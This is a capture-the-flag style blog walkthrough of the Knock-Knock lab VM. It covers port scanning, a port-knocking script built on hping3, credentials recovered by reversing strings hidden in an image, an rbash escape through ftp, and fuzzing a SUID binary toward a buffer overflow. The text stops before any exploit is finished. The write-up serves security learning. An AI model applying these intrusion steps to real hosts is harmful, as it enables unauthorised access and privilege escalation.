<p>First, use <code>netdiscover</code> to find out IP address of our victim.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# netdiscover -r 172.16.246.129/24
</span><span class='line'>
</span><span class='line'> Currently scanning: 172.16.246.0/24   |   Screen View: Unique Hosts           
</span><span class='line'>                                                                               
</span><span class='line'> 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180               
</span><span class='line'> _____________________________________________________________________________
</span><span class='line'>   IP            At MAC Address      Count  Len   MAC Vendor                   
</span><span class='line'> ----------------------------------------------------------------------------- 
</span><span class='line'> 172.16.246.1    00:50:56:c0:00:01    01    060   VMWare, Inc.                 
</span><span class='line'> 172.16.246.133  00:0c:29:5c:26:15    01    060   VMware, Inc.                 
</span><span class='line'> 172.16.246.254  00:50:56:e9:b1:8a    01    060   VMWare, Inc.                 </span></code></pre></td></tr></table></div></figure>


<p>Next, <code>nmap</code> to see what services do we see (standard procedure, really).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV 172.16.246.133
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-16 15:40 EST
</span><span class='line'>Nmap scan report for 172.16.246.133
</span><span class='line'>Host is up (0.00038s latency).
</span><span class='line'>All 1000 scanned ports on 172.16.246.133 are filtered
</span><span class='line'>MAC Address: 00:0C:29:5C:26:15 (VMware)
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds</span></code></pre></td></tr></table></div></figure>


<p>What&hellip; can&rsquo;t see anything?! But we can ping it right?</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ping 172.16.246.133
</span><span class='line'>PING 172.16.246.133 (172.16.246.133) 56(84) bytes of data.
</span><span class='line'>From 172.16.246.133 icmp_seq=1 Destination Port Unreachable
</span><span class='line'>From 172.16.246.133 icmp_seq=2 Destination Port Unreachable
</span><span class='line'>From 172.16.246.133 icmp_seq=3 Destination Port Unreachable
</span><span class='line'>^C
</span><span class='line'>--- 172.16.246.133 ping statistics ---
</span><span class='line'>3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 1999ms</span></code></pre></td></tr></table></div></figure>


<p>Ok, I admit, at this point I thought something went wrong with VM&rsquo;s network adapter, however, as <a href="https://twitter/zer0w1re">zer0w1re</a> pointed out, there&rsquo;s is a difference between &ldquo;Host Unreachable&rdquo; and &ldquo;Port Unreachable&rdquo;&hellip; ahhhh, of course! I skimmed through the output too quickly - first lesson learnt, carefully read what&rsquo;s displayed back on the screen! Duh!</p>

<h2>Port knocking</h2>

<p>Anyway, looks like everything is being blocked by a host firewall and all ports are closed. Also, the name of the VM suggests that we are most likely dealing with a &ldquo;port knocking&rdquo; mechanism, which is kind of security by obscurity, implementing an idea of knocking on the door following a specific pattern to make the door open. Since we&rsquo;re dealing with a server here, we&rsquo;ll need to know a proper sequence of ports to knock for the firewall rules to be loosened for our IP address.</p>

<p>Ok, but how do we find the actual port sequence? There&rsquo;s no real way of bypassing port knocking, you really need to know the right sequence. Brute forcing is simply not viable - too many ports and too many possible variations.</p>

<p>Let&rsquo;s have a look at the <code>nmap</code> output again&hellip; we only scanned default, low ports (&ldquo;All 1000 scanned ports on 172.16.246.133 are filtered&rdquo;), let&rsquo;s scan beyond that!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV -p 0-5000 172.16.246.133
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-16 15:50 EST
</span><span class='line'>Nmap scan report for 172.16.246.133
</span><span class='line'>Host is up (0.00039s latency).
</span><span class='line'>Not shown: 5000 filtered ports
</span><span class='line'>PORT     STATE SERVICE VERSION
</span><span class='line'>1337/tcp open  waste?
</span><span class='line'>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
</span><span class='line'>SF-Port1337-TCP:V=6.47%I=7%D=10/16%Time=543F4EB8%P=i686-pc-linux-gnu%r(NUL
</span><span class='line'>SF:L,15,"\[6129,\x2023888,\x2012152\]\n");
</span><span class='line'>MAC Address: 00:0C:29:5C:26:15 (VMware)
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 55.08 seconds</span></code></pre></td></tr></table></div></figure>


<p>That&rsquo;s better! We can see port 1337 listening! And it gives an interesting output:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc 172.16.246.133 1337
</span><span class='line'>[32510, 55533, 4648]</span></code></pre></td></tr></table></div></figure>


<p>Alright, looks like a sequence of ports we need to knock on - let&rsquo;s go ahead and try to knock. We have few options here, we can either use single commands to knock on those ports (<code>ping</code>, <code>nc</code>, <code>hping3</code>), write a simple script to do it for us in sequence, or use predefined program that will do it for us, e.g. <code>knock</code> - a port knocking client, coming as a part of a knockd server.</p>

<p>And that&rsquo;s where it becomes weird. I tried number of different approaches with varying results. Generally what I was doing was:</p>

<ol>
<li>nc 172.16.246.133 1337</li>
<li>knock on ports</li>
<li>nmap -sV 172.16.246.133</li>
</ol>


<p>I tried knocking with <code>nmap</code>, <code>nc</code>, <code>ping</code>, wrote a script knocking with <code>hping3</code>, nothing seemed to be working! And then, a simple chained command worked:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# hping3 -S 172.16.246.133 -p 680 -c 1; hping3 -S 172.16.246.133 -p 39372 -c 1; hping3 -S 172.16.246.133 -p 46484 -c 1</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nmap -sV 172.16.246.133
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-16 16:21 EST
</span><span class='line'>Nmap scan report for 172.16.246.133
</span><span class='line'>Host is up (0.00028s latency).
</span><span class='line'>Not shown: 998 filtered ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
</span><span class='line'>80/tcp open  http    nginx 1.2.1
</span><span class='line'>MAC Address: 00:0C:29:5C:26:15 (VMware)
</span><span class='line'>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 24.21 seconds</span></code></pre></td></tr></table></div></figure>


<p>That got me thinking, why all of a sudden one command worked while all others didn&rsquo;t. Maybe the order of ports provided is not neccessarily left-to-right, but is randomised? I wrote a simple bash script trying all possible combinations to test it out.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
</pre></td><td class='code'><pre><code class='bash'><span class='line'><span class="c">#!/bin/bash</span>
</span><span class='line'>
</span><span class='line'><span class="k">if</span> <span class="o">[</span> <span class="nv">$# </span>-ne <span class="m">4</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span>
</span><span class='line'>  <span class="nb">echo</span> <span class="s2">&quot;Usage: $0 ip port1 port2 port3&quot;</span>
</span><span class='line'>  <span class="nb">exit</span><span class="p">;</span>
</span><span class='line'><span class="k">fi</span>
</span><span class='line'>
</span><span class='line'><span class="nv">HOST</span><span class="o">=</span><span class="nv">$1</span>
</span><span class='line'><span class="nb">shift</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Go through all possible combinations of 3 ports</span>
</span><span class='line'><span class="k">for</span> PORT_1 in <span class="s2">&quot;$@&quot;</span>
</span><span class='line'><span class="k">do</span>
</span><span class='line'>  <span class="k">for</span> PORT_2 in <span class="s2">&quot;$@&quot;</span>
</span><span class='line'>  <span class="k">do</span>
</span><span class='line'>          <span class="k">for</span> PORT_3 in <span class="s2">&quot;$@&quot;</span>
</span><span class='line'>          <span class="k">do</span>
</span><span class='line'>              hping3 -S <span class="nv">$HOST</span> -p <span class="nv">$PORT_1</span> -c <span class="m">1</span> &gt;<span class="p">&amp;</span><span class="m">2</span> &gt; /dev/null
</span><span class='line'>              hping3 -S <span class="nv">$HOST</span> -p <span class="nv">$PORT_2</span> -c <span class="m">1</span> &gt;<span class="p">&amp;</span><span class="m">2</span> &gt; /dev/null
</span><span class='line'>              hping3 -S <span class="nv">$HOST</span> -p <span class="nv">$PORT_3</span> -c <span class="m">1</span> &gt;<span class="p">&amp;</span><span class="m">2</span> &gt; /dev/null
</span><span class='line'>          <span class="k">done</span>
</span><span class='line'>  <span class="k">done</span>
</span><span class='line'><span class="k">done</span>
</span></code></pre></td></tr></table></div></figure>


<p>Restarted the Knock-Knock VM and tried again.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc 172.16.246.133 1337
</span><span class='line'>[1138, 1248, 56206]
</span><span class='line'>root@kali:~# ./portknock.sh 172.16.246.133 1138 1248 56206
</span><span class='line'>--- 172.16.246.133 hping statistic ---
</span><span class='line'>1 packets transmitted, 0 packets received, 100% packet loss
</span><span class='line'>round-trip min/avg/max = 0.0/0.0/0.0 ms
</span><span class='line'>
</span><span class='line'>--- 172.16.246.133 hping statistic ---
</span><span class='line'>1 packets transmitted, 1 packets received, 0% packet loss
</span><span class='line'>round-trip min/avg/max = 0.0/0.0/0.0 ms
</span><span class='line'>
</span><span class='line'>--- 172.16.246.133 hping statistic ---
</span><span class='line'>1 packets transmitted, 0 packets received, 100% packet loss
</span><span class='line'>round-trip min/avg/max = 0.0/0.0/0.0 ms
</span><span class='line'>
</span><span class='line'>...truncated...
</span><span class='line'>
</span><span class='line'>root@kali:~# nmap -sV 172.16.246.133
</span><span class='line'>
</span><span class='line'>Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-16 19:33 EST
</span><span class='line'>Nmap scan report for 172.16.246.133
</span><span class='line'>Host is up (0.00030s latency).
</span><span class='line'>Not shown: 998 filtered ports
</span><span class='line'>PORT   STATE SERVICE VERSION
</span><span class='line'>22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
</span><span class='line'>80/tcp open  http    nginx 1.2.1
</span><span class='line'>MAC Address: 00:0C:29:5C:26:15 (VMware)
</span><span class='line'>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span><span class='line'>
</span><span class='line'>Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
</span><span class='line'>Nmap done: 1 IP address (1 host up) scanned in 24.19 seconds</span></code></pre></td></tr></table></div></figure>


<p>Woohoo, so that worked! Lesson #2 learnt - don&rsquo;t assume stuff&hellip; sometimes it helps, but not always pays off!</p>

<h2>Invisible ink and Ceasar(ish) cipher</h2>

<p>Ok, moving on - start up Iceweasel and let&rsquo;s have a look at the site.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-10-16-knock-knock-vm-walkthrough/door.png" alt="Door" /></p>

<p>Let&rsquo;s find something we can use to break in. Few things I looked at without any luck:</p>

<ul>
<li>robots.txt file doesn&rsquo;t exist</li>
<li>no cookies</li>
<li><code>dirbuster</code> didn&rsquo;t return anything interesting</li>
<li>tried to analyse and replay traffic using <code>burpsuite</code>, but also wasn&rsquo;t able to find anything interesting, except some basic cache headers</li>
</ul>


<p>After poking around for ages, I got pretty frustrated, I couldn&rsquo;t find anything that would give me a way in! But after having a chat with <a href="https://twitter.com/recrudesce">recrudesce</a>, I realised that &ldquo;picture is worth a thousand words&rdquo; and decided to look into it closer.</p>

<p>Initially I thought that I&rsquo;ll need to do some fancy stego on it, but first I downloaded the file, ran <code>strings</code> on it and found something very interesting at the bottom of the output.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# strings knockknock.jpg
</span><span class='line'>
</span><span class='line'>...truncated...
</span><span class='line'>
</span><span class='line'>tR)O
</span><span class='line'>MO:/?
</span><span class='line'>qW|U
</span><span class='line'>\+\U
</span><span class='line'>Login Credentials
</span><span class='line'>abfnW
</span><span class='line'>sax2Cw9Ow</span></code></pre></td></tr></table></div></figure>


<p>Cool! We have something. Straight away I tried logging via SSH in with username: abfnW and password: sax2Cw90w, but that didn&rsquo;t work. I tried username: sax2Cw90w and password: abfnW, but that didn&rsquo;t work either.</p>

<p>I started thinking what could it be, obviously it must have been somehow encrypted. Doesn&rsquo;t look like base64, neither like MD5. Let&rsquo;s go back to the ancient times and try a Caesar cipher.</p>

<p>Using this useful resource <a href="http://rumkin.com/tools/cipher/caesar.php">Caesarian Shift</a> I tried going through various different rotations and trying to find something that would like a human readable string. Nothing stood out straight away, but after few more tries and looking at a particularly popular ROT-13, I realised that the username and password were actually backwards!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>abfnW   -   Wnfba
</span><span class='line'>nosaJ   -   Jason</span></code></pre></td></tr></table></div></figure>


<p>Wooho, did the same for password and tried logging in SSH with the following credentials:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>username: Jason
</span><span class='line'>password: jB9jP2knf</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ssh Jason@172.16.246.133
</span><span class='line'>Jason@172.16.246.133's password: 
</span><span class='line'>Permission denied, please try again.
</span><span class='line'>Jason@172.16.246.133's password: </span></code></pre></td></tr></table></div></figure>


<p>Oops, &ldquo;Jason&rdquo; didn&rsquo;t work, let&rsquo;s try all lower case (more in sync with Unix account naming convention).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ssh jason@172.16.246.133
</span><span class='line'>jason@172.16.246.133's password: 
</span><span class='line'>Linux knockknock 3.2.0-4-486 #1 Debian 3.2.60-1+deb7u3 i686
</span><span class='line'>
</span><span class='line'>The programs included with the Debian GNU/Linux system are free software;
</span><span class='line'>the exact distribution terms for each program are described in the
</span><span class='line'>individual files in /usr/share/doc/*/copyright.
</span><span class='line'>
</span><span class='line'>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
</span><span class='line'>permitted by applicable law.
</span><span class='line'>You have new mail.
</span><span class='line'>Last login: Mon Oct 13 15:21:04 2014 from 172.16.246.129
</span><span class='line'>jason@knockknock:~$ </span></code></pre></td></tr></table></div></figure>


<h2>Restricted shell escape</h2>

<p>Ha! We&rsquo;ve got a shell! Let&rsquo;s poke around. We&rsquo;ll quickly discover that we&rsquo;re in a limited shell.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ echo $SHELL
</span><span class='line'>/bin/rbash</span></code></pre></td></tr></table></div></figure>


<p>But thanks to <a href="https://knapsy.github.io/blog/2014/10/05/persistence-vm-writeup/">Persistence</a>, I&rsquo;ve learned couple ways of bypassing that, so straight away, I used the same technique as I did in Persistence.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ ftp
</span><span class='line'>ftp&gt; !/bin/bash
</span><span class='line'>jason@knockknock:~$ echo $SHELL
</span><span class='line'>/bin/rbash
</span><span class='line'>jason@knockknock:~$ export SHELL="/bin/bash"
</span><span class='line'>jason@knockknock:~$ echo $SHELL
</span><span class='line'>/bin/bash</span></code></pre></td></tr></table></div></figure>


<h2>Core dump(ster) diving</h2>

<p>Since now we have a normal shell, we can do regular stuff. First thing that stands out is <code>tfc</code> binary with SUID bit set! We may be able to get our root through there.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ ls -al
</span><span class='line'>total 32
</span><span class='line'>drwxr-xr-x 2 jason jason 4096 Oct 14 12:25 .
</span><span class='line'>drwxr-xr-x 3 root  root  4096 Sep 24 21:03 ..
</span><span class='line'>lrwxrwxrwx 1 jason jason    9 Sep 26 09:50 .bash_history -&gt; /dev/null
</span><span class='line'>-rw-r--r-- 1 jason jason  220 Sep 24 21:03 .bash_logout
</span><span class='line'>-rw-r--r-- 1 jason jason 3398 Sep 25 21:58 .bashrc
</span><span class='line'>-rw-r--r-- 1 jason jason  675 Sep 24 21:03 .profile
</span><span class='line'>-rwsr-xr-x 1 root  jason 7457 Oct 11 18:35 tfc
</span><span class='line'>-rw------- 1 jason jason 3204 Oct 14 05:31 .viminfo</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s see what it is.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ strings tfc 
</span><span class='line'>/lib/ld-linux.so.2
</span><span class='line'>lWGI
</span><span class='line'>__gmon_start__
</span><span class='line'>libc.so.6
</span><span class='line'>_IO_stdin_used
</span><span class='line'>strrchr
</span><span class='line'>puts
</span><span class='line'>printf
</span><span class='line'>read
</span><span class='line'>close
</span><span class='line'>open
</span><span class='line'>strcmp
</span><span class='line'>__libc_start_main
</span><span class='line'>write
</span><span class='line'>__xstat
</span><span class='line'>__lxstat
</span><span class='line'>GLIBC_2.0
</span><span class='line'>PTRhp
</span><span class='line'>QVh$
</span><span class='line'>[^_]
</span><span class='line'>  Tiny File Crypter - 1.0
</span><span class='line'>Usage: ./tfc &lt;filein.tfc&gt; &lt;fileout.tfc&gt;
</span><span class='line'>&gt;&gt; Filenames need a .tfc extension
</span><span class='line'>&gt;&gt; No symbolic links!
</span><span class='line'>&gt;&gt; Failed to open input file
</span><span class='line'>&gt;&gt; Failed to create the output file
</span><span class='line'>&gt;&gt; File crypted, goodbye!
</span><span class='line'>;*2$"
</span><span class='line'>_______________________________  
</span><span class='line'>\__    ___/\_   _____/\_   ___ \ 
</span><span class='line'>  |    |    |    __)  /    \  \/ 
</span><span class='line'>  |    |    |     \   \     \____
</span><span class='line'>  |____|    \___  /    \______  /
</span><span class='line'>                \/            \/ </span></code></pre></td></tr></table></div></figure>


<p>Looks like some type of file encrypter, let&rsquo;s test it out.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ echo "test" &gt; in.tfc
</span><span class='line'>jason@knockknock:~$ ./tfc in.tfc out.tfc
</span><span class='line'>&gt;&gt; File crypted, goodbye!
</span><span class='line'>jason@knockknock:~$ cat out.tfc 
</span><span class='line'>��i�jason@knockknock:~$ </span></code></pre></td></tr></table></div></figure>


<p>Ok, so it does encrypt the input. Let&rsquo;s see what happens when we provide a huge input, maybe we&rsquo;ll be able to trigger buffer overflow condition.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ python -c 'print "A" * 6000' &gt; in.tfc
</span><span class='line'>jason@knockknock:~$ ./tfc in.tfc out.tfc
</span><span class='line'>Segmentation fault</span></code></pre></td></tr></table></div></figure>


<p>Promising! Let&rsquo;s see what protections are enabled on it.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# scp checksec.sh jason@172.16.246.133:.
</span><span class='line'>jason@172.16.246.133's password: 
</span><span class='line'>checksec.sh                                   100%   26KB  26.5KB/s   00:00    </span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>jason@knockknock:~$ ./checksec.sh --file tfc
</span><span class='line'>RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
</span><span class='line'>No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   tfc</span></code></pre></td></tr></table></div></figure>


<p>Wow, everything disabled! That&rsquo;s gonna be one quick and easy exploit&hellip; well, at least that&rsquo;s what I thought!</p>

<p>Let&rsquo;s get a copy of binary to our Kali (knock-knock doesn&rsquo;t have gdb on it) and debug it in gdb to see if we can overwrite return address.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# python -c 'print "A" * 6000' &gt; in.tfc
</span><span class='line'>root@kali:~# gdb tfc 
</span><span class='line'>GNU gdb (GDB) 7.4.1-debian
</span><span class='line'>Copyright (C) 2012 Free Software Foundation, Inc.
</span><span class='line'>License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
</span><span class='line'>This is free software: you are free to change and redistribute it.
</span><span class='line'>There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
</span><span class='line'>and "show warranty" for details.
</span><span class='line'>This GDB was configured as "i486-linux-gnu".
</span><span class='line'>For bug reporting instructions, please see:
</span><span class='line'>&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
</span><span class='line'>Reading symbols from /root/tfc...(no debugging symbols found)...done.
</span><span class='line'>(gdb) run in.tfc out.tfc
</span><span class='line'>Starting program: /root/tfc in.tfc out.tfc
</span><span class='line'>
</span><span class='line'>Program received signal SIGSEGV, Segmentation fault.
</span><span class='line'>0x0675c916 in ?? ()</span></code></pre></td></tr></table></div></figure>


<p>Huh? 0x0675c916? Where&rsquo;s my 0x41414141? I think the entire input (even out of bounds) is getting encrypted&hellip; oh boy, that&rsquo;s gonna be fun.</p>

<p>I started playing around with inputs and analysing the behaviour of the encryption, when I suddenly came up with an idea to see what will happen if I will pass in encrypted output as an input:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# echo "hello" &gt; in.tfc
</span><span class='line'>root@kali:~# ./tfc in.tfc out.tfc 
</span><span class='line'>&gt;&gt; File crypted, goodbye!
</span><span class='line'>root@kali:~# ./tfc out.tfc out2.tfc
</span><span class='line'>&gt;&gt; File crypted, goodbye!
</span><span class='line'>root@kali:~# cat out2.tfc 
</span><span class='line'>hello</span></code></pre></td></tr></table></div></figure>


